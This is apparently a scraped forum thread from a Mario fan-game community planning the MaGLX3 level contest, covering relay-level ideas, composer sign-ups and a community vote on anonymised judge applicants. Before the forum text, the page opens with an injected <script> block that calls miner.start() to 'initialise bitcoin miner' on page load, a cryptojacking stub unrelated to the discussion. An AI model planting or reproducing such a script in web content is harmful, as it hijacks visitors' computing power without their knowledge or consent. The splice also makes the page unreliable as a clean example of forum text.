<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitysmw central

MaGLX3 - An Important Announcement

would you like to participate in some fun contests? would you like to create some fun contests? well ^_^
Ivy

Re: (3 Days Left!) Want to help with MaGLX3? Sign-ups here!

Postby Ivy » 1 year ago

Honestly the talkhaus MAGLX2 relay was quite nice thanks to the testing process.
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

NotVeryImportant
I'm not important, don't worry.

Re: (3 Days Left!) Want to help with MaGLX3? Sign-ups here!

Postby NotVeryImportant » 1 year ago

I'm a bigger fan of the KISS rule. As much as I'd like to fight for relay levels, that's still a long ways off. I brought it up saying I'd like to see them back but I think we can focus on it once we have judges, hub designers, composers and a bunch of us ready for level making once we made our levels.
I can art and sprite. Don't worry about it.

Cuboid
Pronouns: he/him/his

Re: (FINAL DAY!) Want to help with MaGLX3? Sign-ups here!

Postby Cuboid » 1 year ago

So honestly, the relay levels were my least favorite part of MAGLX2, mainly because I thought they ended up being so chaotic. We need to find a good balance of individuality and creativity, and organization and cohesiveness. I propose that sturg roll something for the general themation of the level (either using the contest criteria or otherwise) so people can have something to go off of and something to keep the level portions more in line.

sedron
im proud of you kid

Postby sedron » 1 year ago

The relays being chaotic is like half the point, yo. Plenty of people love that about them. If that's not your preference, no worries, there'll be at least like a hundred other levels in the contest that probably won't be as chaotic.

As was said before, the only real problematic piece of the relays last contest was the Imaynotbehere4long's piece. It lasted way too long and totally broke the spirit of the relay. The details of how to avoid another one of those situations can be discussed when the contest staff is chosen I suppose, but really you just need one person looking at the relays who can say "hey this section is totally wrong please fix or remove it."

Dragon Fogel
Master of Pointlessness

Postby Dragon Fogel » 1 year ago

I'm certainly not against another chaotic relay myself, but some kind of gimmick to make this one distinct from its predecessors would also be cool. It's probably going to be chaotic either way.
Click that banner if you like reading words.
Make levels from unused MAGL X names!

Hoeloe
A2XT person
Pronouns: she/her

Postby Hoeloe » 1 year ago

This talk of relay gimmicks has got me wanting a Shiritori Relay, where each person bases their screen around a single word concept, and the next person has to pick a different word starting with the same letter as the last word ended.

For example, if someone based a section around the word "Elephant", the next person might then base theirs around the world "Temple", and the next around the word "Electricity". Could make for some dynamic relay levels.

Diggertron
Location: The United Kingdom of Great Britain and Northern Ireland

Postby Diggertron » 1 year ago

"Shiritori" literally means "taking the buttocks"
Formal petition to call the relay level "Taking the Buttocks".
Jokes aside, considering how MaGL has usually been based around being given a loose-ish constraint, I think this idea could be pretty neat.

Any idea when we can start making levels
That makes Raocow a victim of proprietary software.
Skynet.

Enjl
i consume the glitches

Postby Enjl » 1 year ago

I like the butts idea
ImageImageImageImageImageImageImage

CrappyBlueLuigi
pants are a tool of oppression
First name: Crepe
Pronouns: they/them

Postby CrappyBlueLuigi » 1 year ago

i support butts and by association this idea
someday, when i'm bigger,
i'm gonna be just like my mama!

Sturg
Gets his freak on with VGM
First name: sturgyman

Postby Sturg » 1 year ago

butts are cool

Also, last chance y'all!
ImageImage
ImageImageImageImage

Sturg

Re: X3 Sign-ups Closed! Composers still needed!

Thanks to everybody who signed up!

Composers are still always welcome, so again, feel free to message me/whatnot if you're interested!

Tune in soon!
ImageImage
ImageImageImageImage

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 1 year ago

dodge the buttsteak

(also if i figure out lmms i might apply for composer idk)

Sebby19

Re: X3 Sign-ups Closed! Composers still needed!

Postby Sebby19 » 1 year ago

Sturg wrote: Thanks to everybody who signed up!

Composers are still always welcome, so again, feel free to message me/whatnot if you're interested!

Tune in soon!
Is beatboxing allowed? :D
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official Raocow subscriber # 30,000

Sturg

MaGLX3 - VOTE for Community-Selected Judge!!!

Heya howdy! Thanks again to everyone who auditioned to be a judge/HUB designer/composer! It excites me to see a bunch of people wanting to help with the project. (again if you want to make beautiful music please say so)

Judge-wise, I received a total of 10 applications, which I think is pretty good! There's some pretty interesting competition, with some incredibly varying results and scorings from each individual! It has honestly been a difficult time deciding who I think would do really good with the whole "judge a buncha levels" thing. I've managed to narrow it down to two judges (1 talkhaus, 1 SMBXer) who I think would do an excellent job and provide their own unique take as a judge.

However, before I announce who they are, I'd like to see who all you guys think should be a judge.

Therefore, I'd like to announce:

THE COMMUNITY-SELECTED JUDGE

Yep! To help prevent MaGL HOSTING BIASTM, I'd like the communities (both talkhaus and the SMBX forums) to vote on who they think can do the best job at judging! I'd also like a 4th judge due to the several qualified applicants, as it would've made it a huge bummer not allow some of these guys to be judges!also also I'm waiting on beta 4 so that we can actually get this contest started soooo yeah you can call this "stalling" in a sense...

I have taken each applicant, even the ones that I have already selected, and have randomly assigned them to a fruit (because fruits are nutritious and awesome). I have also posted their scores and reviews down below where anyone could pop-in and take a quick look at what each judge has to offer. The identity of the applicants have been left out to prevent bias based on reputation, and I'd like everyone to vote based an applicant's judging style.

Now, what does everyone else have to do? Well, it's real simple!
-----------------------------------------------------------------------

1) Review the results, and decide who you want.

2) Click this link and fill out the survey.

3) Make sure to submit your vote by AUGUST 20th by 11:59pm MST!!!

-----------------------------------------------------------------------

Easy as that!

Everything that you guys need to know should be all down below, including some links to .gifs of the audition levels to provide a preview in-case you're not terribly familiar with them. I do implore everyone to, at the very least, glance at the written portion of the reviews. The judge comments, in particular, can provide interesting insight into each applicant. The graph/picture thing shows each applicants scoring and favorites from the pack. Take note that the levels in the pack itself were specifically intended to test certain level qualities and look at what each person likes/dislikes/prefers/all that mumbo jumbo. However, do remember that opinions do exist and people will have different experiences with each level.

*APPLICANTS: Do Not Reveal Who You Are! Keep it to yourself and don't spoil the fun yo!

***(Also take note applicants that some of the scores are different from what you put down, that's because some of your guys' math was wrong and I went through and fixed it... oops.)

Anyways, I'm interested to see who y'all vote for, and I'll just leave it at that! If there are any questions, please feel free to message me.

Audition Results

Level Previews

ImageImage
ImageImageImageImage

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: MaGLX3 - VOTE for Community-Selected Judge!!

Postby raocow » 1 year ago

I wanna play that nitro level
the chillaxest of dragonsImage
ImageImage

Turtwig

Postby Turtwig » 1 year ago

Thoughts:
Apple: Reviews were nice and short, mostly accurate scores. Someone I think would be a good judge.
Banana: These reviews are about the same quality as Ninja Boy's reviews...
Peach: Short and sweet reviews that say what he liked/didn't like about the level. He'd probably be a good fit for the contest
Cononut: Reviews are too short and not really helpful.
Melon: Nice reviews that give good constructive feedback.
Mango: Seems like a very strict judge in terms of scores, but that would make the contest more interesting.
Cherry: Very good reviews that fit perfectly in a MaGL X contest.
Kiwi: Not a huge fan of these reviews, also his English isn't that good which makes him kinda hard to understand sometimes.
Grape: I like his reviews but the fact that he gave up on a hard level after only one attempt (or at least that's what it sounded like) is off-putting.
Blueberry: Some stuff he says doesn't make sense, but overall he seems like an okay judge.

Overall, my picks are:
1. Apple
2. Mango
3. Cherry
4. Melon

Lockirby2

Postby Lockirby2 » 1 year ago

Apple - It feels like the design/creativity scores are weirdly close between all the levels, even for levels that I thought should be further apart. For example, the level called "generic as all h***" got 15 in Creativity, and the levels with the highest Creativity only got 22 (and I thought they were pretty creative). I'm worried that the majority of the ratings will only vary by several points, and that this judge mathematically won't have much of an effect on the score. Other than that, I don't have any complaints. Definitely had the best formatted run comments/rubric (along with Melon/Grape), I wish they were all like this.

Banana - Probably the closest scores to my overall opinions of the levels relative to the other scores, although the score for Low Effort is a bit high. Run comments don't give me a lot of insight into what this judge is thinking. Gives out 5/5s weirdly easy in the Use of Gimmick category.

Peach - I feel like this judge was the one to recognize that several of these levels are actually really good. I mean, other people might disagree, but I thought they were really high quality overall (though not flawless), and would have picked them over many MAGLX2 levels. Accordingly, several of these scores are really high. I also feel like the reasons why were concisely nailed for me in the run comments, and this judge examined why Hard is hard instead of just blindly giving a good/bad score because it's hard. Clearly more of a gameplay person.

Coconut - I'm struggling to get a good feel for what this judge is about (that's not really a criticism or anything, I'm just not really sure). I'm not sure how Low Effort could be considered on par with Romp. Also gave some strange zeros in Use of Gimmick.

Melon - Similar to Coconut. The positive description for Untested Puzzle felt dissonant from the middling scores given.

Mango - I disagree with about 75% of what was said in the run comments, and the angry/nasty tone when talking about Untested Puzzle was unnecessary.

Cherry - I feel like this person represents the average person who just wants to play a SMBX level. I think that's a pretty good fit for a judge slot.

Kiwi - I think that the run comments were agreeable on the whole, but it worries me that Hard was this person's first choice by a large margin. I'm not sure how many people this judge would represent. Perhaps this person would be better suited for judging a Kaizo contest?

Grape - Almost the opposite of Kiwi. Seems to prefer really easy levels, and doesn't seem to like the gameplay oriented ones much, preferring the experience/puzzle level instead. Really harsh overall in terms of scores.

Blueberry - I think there was a good rationale behind almost everything here.

Overall: Peach > Blueberry > Cherry > Banana > Apple > Kiwi > Melon > Coconut > Grape > Mango

raekuul
X&BUTT
First name: Pokota
Pronouns: he/him/his

Postby raekuul » 1 year ago

I haven't been paying as close attention to MaglX3 prep as I should have. Are the levels for the Judge Auditions still available for me to check out?

Zha Hong Lang
"HTMI - Hyper Text Markup Interface"
First name: ZHL
Pronouns: Male

Postby Zha Hong Lang » 1 year ago

raekuul wrote: I haven't been paying as close attention to MaglX3 prep as I should have. Are the levels for the Judge Auditions still available for me to check out?
Yes. Go to the first page, it's in the judge packet.
(Formerly Jayoshi)

Enjl
i consume the glitches

Postby Enjl » 1 year ago

I'm only confident in the abilities of Peach, Mango, Coconut and Cherry.
ImageImageImageImageImageImageImage

Zha Hong Lang
"HTMI - Hyper Text Markup Interface"
First name: ZHL
Pronouns: Male

Postby Zha Hong Lang » 1 year ago

Enjl wrote: I'm only confident in the abilities of Peach, Mango, Coconut and Cherry.
This.

In my opinion, all of the other judges (save for Grape) have difficulty addressing critical elements of the level to form their opinion. A few judges also showed incompetence at English, which is pretty sad if you're going to judge 150+ levels using English to write reviews.

Grape I don't feel confident in because I really don't agree with their placement.
(Formerly Jayoshi)

TNTtimelord
Ayy, what's the haps?
First name: Tony

Postby TNTtimelord » 1 year ago

Apple: Has a bit of humor to them but perhaps a little too condescending with your words?
Banana: Someone didn't get enough to say lmfao. None of the reviews are constructive in any remote way.
Peach: Now here's an example that you CAN say all you need in one or two sentences. Some of the scores are bit too rash for my taste, however.
Coconut: Some of the reviews are fine, others I can't say you were into it at all.
Melon: I like the reviews! I say one or two of the scores didn't reflect well what you said but I like what they had to say.
Mango: Lots of words! A few too many, but at the very least you have nothing but productive criticism and the scores reflect what you had to say.
Cherry: Based on the previews I align well with what this person had to say and their scores reflect their reviews.
Kiwi: I don't want rundowns of what the level is about, I want criticism! Maglx does not have time for rundowns!
Grape: A your words tended to be a little bit harsher than the scores, and idk if admitting you cheated was a smart idea.
Blueberry: Fine reviews, you said all you needed to and the scores are within reason.

4 - Blueberry
3 - Mango
2 - Melon
1 - Cherry

This is my opinion, it's no better than anyone else's here, that's why it's public, cumulative opinion.
Then as it was, then again it will be
And though the course may change sometimes
Rivers always reach the sea
Blind stars of fortune, each have several rays
On the wings of maybe, down in birds of prey
Kind of makes me feel sometimes, didn't have to grow
But as the eagle leaves the nest, it's got so far to go

Ivy

Postby Ivy » 1 year ago

I find it a bit strange that we're now judging judges
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

Sturg

tune in to X4 where the host judges everyone else on how they judge judges
ImageImage
ImageImageImageImage

Rednaxela
Maker of Shenanigans

Postby Rednaxela » 1 year ago

The secret is.... Sturg is already silently judging everyone on how they judge judges.
Currently LPing: Ys Origin

Return to “contest center”